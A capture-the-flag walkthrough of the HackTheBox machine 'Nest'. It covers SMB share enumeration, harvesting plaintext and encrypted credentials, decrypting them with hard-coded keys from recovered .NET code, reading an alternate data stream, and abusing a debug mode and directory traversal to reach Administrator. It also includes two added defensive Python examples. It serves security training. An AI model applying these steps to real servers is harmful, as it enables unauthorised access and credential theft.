Hackthebox – Nest
As with all targets, Nest is no exception to starting with several port scans. Below the output of the full port scan.
root@kalivm:~/Nest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 10:09 CET
Nmap scan report for 10.10.10.178
Host is up (0.021s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.80%I=7%D=3/6%Time=5E621430%P=x86_64-pc-linux-gnu%r(NUL
SF:L,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLine
SF:s,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised
SF:\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20
SF:V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comman
SF:d\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n
SF:\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repor
SF:ting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"\
SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\x
SF:20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\x
SF:20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20the
SF:\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---\
SF:r\n\r\nLIST\r\nSETDIR\x20\r\nRUNQUERY\x20\r\n
SF:DEBUG\x20\r\nHELP\x20 \r\n>")%r(SSLSessionReq,21,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCookie
SF:,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionRe
SF:q,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,21
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A,
SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20c
SF:ommand\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\
SF:r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\
SF:r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20Re
SF:porting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x20
SF:Reporting\x20Service\x20V1\.2\r\n\r\n>");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 392.76 seconds
So only ports 445 and 4386 are open. The fingerprint output is a bit scrambled, so I decide to open port 4386 first in a web browser.
That only gave me an unrecognised command and a session timeout, which did not help me much either. Therefore, the next vector is of course the SMB server on port 445. First, time to see if I can list all shares.
root@kalivm:~/Nest# smbclient -L \\10.10.10.178 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.178 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available
So there are several shares listed that can potentially be opened. Time to continue the investigation on the Data share.
root@kalivm:~/Nest# smbclient \\\\10.10.10.178\\Data -N
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
. D 0 Thu Aug 8 00:53:46 2019
.. D 0 Thu Aug 8 00:53:46 2019
IT D 0 Thu Aug 8 00:58:07 2019
Production D 0 Mon Aug 5 23:53:38 2019
Reports D 0 Mon Aug 5 23:53:44 2019
Shared D 0 Wed Aug 7 21:07:51 2019
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
\Production
NT_STATUS_ACCESS_DENIED listing \Production\*
\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*
\Shared
. D 0 Wed Aug 7 21:07:51 2019
.. D 0 Wed Aug 7 21:07:51 2019
Maintenance D 0 Wed Aug 7 21:07:32 2019
Templates D 0 Wed Aug 7 21:08:07 2019
\Shared\Maintenance
. D 0 Wed Aug 7 21:07:32 2019
.. D 0 Wed Aug 7 21:07:32 2019
Maintenance Alerts.txt A 48 Tue Aug 6 01:01:44 2019
\Shared\Templates
. D 0 Wed Aug 7 21:08:07 2019
.. D 0 Wed Aug 7 21:08:07 2019
HR D 0 Wed Aug 7 21:08:01 2019
Marketing D 0 Wed Aug 7 21:08:06 2019
\Shared\Templates\HR
. D 0 Wed Aug 7 21:08:01 2019
.. D 0 Wed Aug 7 21:08:01 2019
Welcome Email.txt A 425 Thu Aug 8 00:55:36 2019
\Shared\Templates\Marketing
. D 0 Wed Aug 7 21:08:06 2019
.. D 0 Wed Aug 7 21:08:06 2019
A welcome e-mail; that might be interesting. Time to download it and see what its contents are.
smb: \> get "Shared\Templates\HR\Welcome Email.txt"
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Shared\Templates\HR\Welcome Email.txt (4.8 KiloBytes/sec) (average 4.8 KiloBytes/sec)
smb: \> ^C
root@kalivm:~/smbdata# ls
smbdata smbdatalsl 'Welcome Email.txt'
root@kalivm:~/smbdata# cat Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff,
You will find your home folder in the following location:
\\HTB-NEST\Users\
If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.
Username: TempUser
Password: welcome2019
Thank you
So now we have a username and password. This might allow for more enumeration of the shares, so time to try it.
root@kalivm:~/Nest# smbclient -U TempUser \\\\10.10.10.178\\Data
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
. D 0 Thu Aug 8 00:53:46 2019
.. D 0 Thu Aug 8 00:53:46 2019
IT D 0 Thu Aug 8 00:58:07 2019
Production D 0 Mon Aug 5 23:53:38 2019
Reports D 0 Mon Aug 5 23:53:44 2019
Shared D 0 Wed Aug 7 21:07:51 2019
\IT
. D 0 Thu Aug 8 00:58:07 2019
.. D 0 Thu Aug 8 00:58:07 2019
Archive D 0 Tue Aug 6 00:33:58 2019
Configs D 0 Thu Aug 8 00:59:34 2019
Installs D 0 Thu Aug 8 00:08:30 2019
Reports D 0 Sun Jan 26 01:09:13 2020
Tools D 0 Tue Aug 6 00:33:43 2019
---snip---
\IT\Configs
. D 0 Thu Aug 8 00:59:34 2019
.. D 0 Thu Aug 8 00:59:34 2019
Adobe D 0 Wed Aug 7 21:20:09 2019
Atlas D 0 Tue Aug 6 13:16:18 2019
DLink D 0 Tue Aug 6 15:25:27 2019
Microsoft D 0 Wed Aug 7 21:23:26 2019
NotepadPlusPlus D 0 Wed Aug 7 21:31:37 2019
RU Scanner D 0 Wed Aug 7 22:01:13 2019
Server Manager D 0 Tue Aug 6 15:25:19 2019
---snip---
\IT\Configs\NotepadPlusPlus
. D 0 Wed Aug 7 21:31:37 2019
.. D 0 Wed Aug 7 21:31:37 2019
config.xml A 6451 Thu Aug 8 01:01:25 2019
shortcuts.xml A 2108 Wed Aug 7 21:30:27 2019
\IT\Configs\RU Scanner
. D 0 Wed Aug 7 22:01:13 2019
.. D 0 Wed Aug 7 22:01:13 2019
RU_config.xml A 270 Thu Aug 8 21:49:37 2019
Now this is where I spent quite some time looking through all the files. As I now had access to the IT share too, I was able to browse all the config files. The two worth mentioning were the RU Scanner and NotepadPlusPlus configuration files.
root@kalivm:~/Nest# cat RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
root@kalivm:~/Nest# echo -n fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= | base64 -d
}13=XJBAX*Wcf?βc
So I have found a username and password combination. Although the password looked like a normal, valid Base64 string, decoding it only produced binary garbage, and the password got rejected when I tried it. I had to continue the search, and after a while I found the config file for NotepadPlusPlus, which contains some of the history of opened files; that is rather interesting.
root@kalivm:~/Nest# cat config.xml
---snip---
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
---snip---
So a file in the IT\Carl directory on the Secure$ share was opened. Time to see if I can access the same path.
root@kalivm:~/Nest# smbclient -U TempUser \\\\10.10.10.178\\Secure$
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> ls IT\
NT_STATUS_ACCESS_DENIED listing \IT\
Apparently, I am unable to list files in the IT directory. Trying to simply change into the directory is the next step.
smb: \> cd IT\Carl
smb: \IT\Carl\> ls
. D 0 Wed Aug 7 21:42:14 2019
.. D 0 Wed Aug 7 21:42:14 2019
Docs D 0 Wed Aug 7 21:44:00 2019
Reports D 0 Tue Aug 6 15:45:40 2019
VB Projects D 0 Tue Aug 6 16:41:55 2019
10485247 blocks of size 4096. 6543698 blocks available
smb: \IT\Carl\>
After simply changing into the IT\Carl directory, it appears that I am allowed to list its contents, and it shows several subdirectories. After some more browsing through the various directories, the ‘VB Projects’ directory appeared especially interesting, as it contains the RU_Scanner project for which I had encountered a config file before. After downloading the project as a whole, I started to analyze it, first looking at the Module1.vb file.
root@kalivm:~/RUScanner# cat Module1.vb
Module Module1
    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
    End Sub
End Module
Apparently this code is built to open the RU_Config file that I found earlier and then decrypt the password string. This might be interesting, so let’s take a look at the Utils.vb file.
root@kalivm:~/RUScanner# cat Utils.vb
Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            ' Passphrase, salt, iteration count, IV and key size are all hard-coded in the
            ' client, so anyone holding the binary can reverse the value stored in the config.
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function
---snip---
So this contains a decryption function which apparently decodes the password from the RU_Config.xml file, with all of the key material hard-coded in the client. Time to put this code in dotnetfiddle and see what it comes up with.
Running it decodes the string into the value ‘xRxRxPANCAK3SxRxRx’, which might be the password. Time to see if I can get Carl’s home directory to sync using a recursive smbget.
root@kalivm:~/Nest# smbget -rR smb://10.10.10.178/Users/c.smith -U c.smith
Password for [c.smith] connecting to //Users/10.10.10.178:
Using workgroup WORKGROUP, user c.smith
smb://10.10.10.178/Users/c.smith/HQK Reporting/AD Integration Module/HqkLdap.exe
smb://10.10.10.178/Users/c.smith/HQK Reporting/Debug Mode Password.txt
smb://10.10.10.178/Users/c.smith/HQK Reporting/HQK_Config_Backup.xml
smb://10.10.10.178/Users/c.smith/user.txt
Downloaded 17.27kB in 3 seconds
root@kalivm:~/Nest# ls c.smith
'HQK Reporting' user.txt
root@kalivm:~/Nest# cat user.txt
cf71b25<NOFLAG>4fd827e05f426e987
So that worked and I have found the user flag. Now on to the root flag!
Privilege Escalation
The output of the previous ‘ls’ command made me curious why the Debug Mode Password.txt file did not show up, so I went back to the SMB share to investigate.
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time: Fri Aug 9 01:06:12 AM 2019 CEST
access_time: Fri Aug 9 01:06:12 AM 2019 CEST
write_time: Fri Aug 9 01:08:17 AM 2019 CEST
change_time: Fri Aug 9 01:08:17 AM 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\>
So this info actually shows that there is an alternate data stream in the password file. I am not sure what it’s useful for yet, but it might be interesting to find out what is in that stream.
smb: \C.Smith\HQK Reporting\> get DEBUGM~1.txt:password
getting file \C.Smith\HQK Reporting\DEBUGM~1.txt:password of size 15 as DEBUGM~1.txt:password (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\> ^C
root@kalivm:~/Nest# cat DEBUGM~1.txt:password
WBQ201953D8w
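The allinfo output above is the only place the Password stream shows up: directory listings and a plain smbget copy only ever see the default stream. As an added example that is not part of the original write-up, this Python parses allinfo output (a constructed sample modelled on the one above) and flags files that carry alternate data streams, a useful triage check when reviewing what is stored on a share.

```python
import re

# Constructed sample, modelled on the smbclient "allinfo" output for
# "Debug Mode Password.txt": the unnamed default stream is empty, while a
# named stream "Password" carries 15 bytes.
ALLINFO_SAMPLE = """\
altname: DEBUGM~1.TXT
create_time:    Fri Aug  9 01:06:12 AM 2019 CEST
write_time:     Fri Aug  9 01:08:17 AM 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
"""

# One "stream:" line -> (full stream name, size in bytes)
STREAM_RE = re.compile(r"^stream:\s*\[(?P<name>[^\]]*)\],\s*(?P<size>\d+)\s+bytes", re.M)


def parse_streams(allinfo_text):
    """Return [(stream_name, size), ...] for every stream listed by allinfo."""
    return [(m.group("name"), int(m.group("size")))
            for m in STREAM_RE.finditer(allinfo_text)]


def alternate_streams(allinfo_text):
    """Named streams other than the default '::$DATA'.

    ls/dir listings and plain copies (smbget, cp) only see the default stream,
    so every entry returned here is content a file-level review would miss.
    Returned as (short name, size), e.g. ('Password', 15).
    """
    return [(name.split(":")[1], size)
            for name, size in parse_streams(allinfo_text)
            if name != "::$DATA"]


def audit_finding(filename, allinfo_text):
    """One triage line for a file carrying alternate data streams, else None."""
    extras = alternate_streams(allinfo_text)
    if not extras:
        return None
    default = dict(parse_streams(allinfo_text)).get("::$DATA", 0)
    listed = ", ".join(f"{n} ({s} bytes)" for n, s in extras)
    return (f"{filename}: default stream {default} bytes; "
            f"alternate streams: {listed}")


if __name__ == "__main__":
    print(audit_finding("Debug Mode Password.txt", ALLINFO_SAMPLE))
```

An empty default stream next to a non-empty named one, as here, is the pattern worth flagging first.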
As I had not yet further investigated the service on the high port, I decided to access it using netcat, but that did not give back any feedback apart from the first banner. Therefore, I tried to access it with good ol’ telnet.
root@kalivm:~/Nest# telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
So this seemed to work, and there is a debug command that requires a password. This is where the previously found password may come in useful!
>debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
In debug mode, the SERVICE, SESSION and SHOWQUERY commands are apparently added as options. Time to further analyze the behavior of all these functions.
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml
Current Directory: HQK
So apparently it is possible to change directories through the file system. Since I came from the ALL QUERIES directory, I first try to look into the LDAP directory.
>setdir ldap
Current directory set to ldap
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
Current Directory: ldap
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
Here I see again the same HqkLdap.exe file which I had seen before, as well as an administrator’s encrypted password that looks similar to Carl’s, which I decoded previously. Time to check out the HqkLdap.exe file to see what it actually does.
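The SETDIR .. step above shows the service following its argument straight out of the query directory, which is how Ldap.conf became readable. As an added example (not the HQK service’s own code), the following Python puts that unconfined join next to a confined version that canonicalises the path and refuses anything outside the query root; the install path and the ‘Monthly’ subdirectory are constructed for the example.

```python
import os

# Constructed layout modelled on the LIST output above: queries run from
# "ALL QUERIES", while the parent "HQK" directory and the sibling "LDAP"
# directory (holding Ldap.conf) must stay out of reach. The install path is
# an assumption for this example, not something the write-up states.
QUERY_ROOT = "/opt/HQK/ALL QUERIES"


def unsafe_setdir(current, requested):
    """Mirrors the observed behaviour: the argument is joined onto the current
    directory without confinement, so 'SETDIR ..' climbs out of the query root."""
    return os.path.normpath(os.path.join(current, requested))


def safe_setdir(current, requested, root=QUERY_ROOT):
    """Resolve the requested directory and refuse anything outside root.

    realpath() collapses '..' (and symlinks, where the path exists); commonpath()
    is used instead of a string-prefix test so that '/opt/HQK/ALL QUERIES2' is
    not mistaken for a child of '/opt/HQK/ALL QUERIES'.
    """
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(current, requested))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PermissionError(f"SETDIR refused: {requested!r} leaves the query root")
    return candidate


def handle_setdir(session, argument):
    """Process one SETDIR command for a client session (a dict holding 'cwd').

    On refusal the session directory is left unchanged and a generic message is
    returned, so the client learns nothing about the layout outside the root.
    """
    try:
        session["cwd"] = safe_setdir(session["cwd"], argument)
    except PermissionError:
        return "Invalid directory"
    return f"Current directory set to {os.path.basename(session['cwd'])}"


if __name__ == "__main__":
    print(unsafe_setdir(QUERY_ROOT, ".."))        # /opt/HQK: traversal succeeds
    session = {"cwd": QUERY_ROOT}
    print(handle_setdir(session, ".."))           # Invalid directory
    print(handle_setdir(session, "../LDAP"))      # Invalid directory
    print(handle_setdir(session, "Monthly"))      # Current directory set to Monthly
```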
After opening the HqkLdap.exe file using ILSpy, I notice a CR class containing the DS function, which seems to require an encrypted string. It might be worth trying this in dotnetfiddle again, but with the admin password I just found.
So using dotnetfiddle, I slightly modified the code to output the decrypted value. Now it is time to see if I can connect to the Users share with this password (XtH4nkS4Pl4y1nGX) and access the Administrator directory.
root@kalivm:~/Nest# smbclient -U Administrator \\\\10.10.10.178\\Users
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd Administrator\
smb: \Administrator\> ls
. D 0 Fri Aug 9 17:08:23 2019
.. D 0 Fri Aug 9 17:08:23 2019
flag.txt - Shortcut.lnk A 2384 Fri Aug 9 17:10:15 2019
10485247 blocks of size 4096. 6543627 blocks available
smb: \Administrator\> get "flag.txt - Shortcut.lnk"
getting file \Administrator\flag.txt - Shortcut.lnk of size 2384 as flag.txt - Shortcut.lnk (30.6 KiloBytes/sec) (average 30.6 KiloBytes/sec)
smb: \Administrator\> ^C
root@kalivm:~/Nest# cat flag.txt\ -\ Shortcut.lnk
[binary .lnk contents; non-printable bytes omitted. The readable strings give the shortcut target:]
\\HTB-NEST\C$\Users\Administrator\Desktop\flag.txt
..\..\c$\Users\Administrator\Desktop\flag.txt
\\Htb-nest\c$\Users\Administrator\Desktop
flag.txt - Text Document
That directory, however, only contained a shortcut to the actual flag, which is stored in C:\Users\Administrator\Desktop. Since I now have the administrator’s credentials, I might as well access the C$ admin share and go through there.
root@kalivm:~/Nest# smbclient -U Administrator \\\\10.10.10.178\\C$
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Tue Jul 14 04:34:39 2009
Boot DHS 0 Sat Jan 25 22:15:35 2020
bootmgr AHSR 383786 Sat Nov 20 05:40:08 2010
BOOTSECT.BAK AHSR 8192 Tue Aug 6 07:16:26 2019
Config.Msi DHS 0 Sat Jan 25 22:49:12 2020
Documents and Settings DHS 0 Tue Jul 14 07:06:44 2009
pagefile.sys AHS 2146881536 Fri Mar 6 08:43:46 2020
PerfLogs D 0 Tue Jul 14 05:20:08 2009
Program Files DR 0 Thu Aug 8 01:40:50 2019
Program Files (x86) DR 0 Tue Jul 14 07:06:53 2009
ProgramData DH 0 Mon Aug 5 22:24:41 2019
Recovery DHS 0 Mon Aug 5 22:22:25 2019
restartsvc.bat A 33 Thu Aug 8 01:43:09 2019
Shares D 0 Tue Aug 6 15:59:55 2019
System Volume Information DHS 0 Tue Aug 6 06:17:38 2019
Users DR 0 Thu Aug 8 19:19:40 2019
Windows D 0 Fri Mar 6 09:37:08 2020
10485247 blocks of size 4096. 6543627 blocks available
Bingo! All I have to do now is go to the admin desktop and get the flag!
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> ls
. DR 0 Sun Jan 26 08:20:50 2020
.. DR 0 Sun Jan 26 08:20:50 2020
desktop.ini AHS 282 Sat Jan 25 23:02:44 2020
root.txt A 32 Tue Aug 6 00:27:26 2019
10485247 blocks of size 4096. 6543627 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> ^C
root@kalivm:~/Nest# cat root.txt
6594c2e<NOFLAG>08a42f0b94b878c41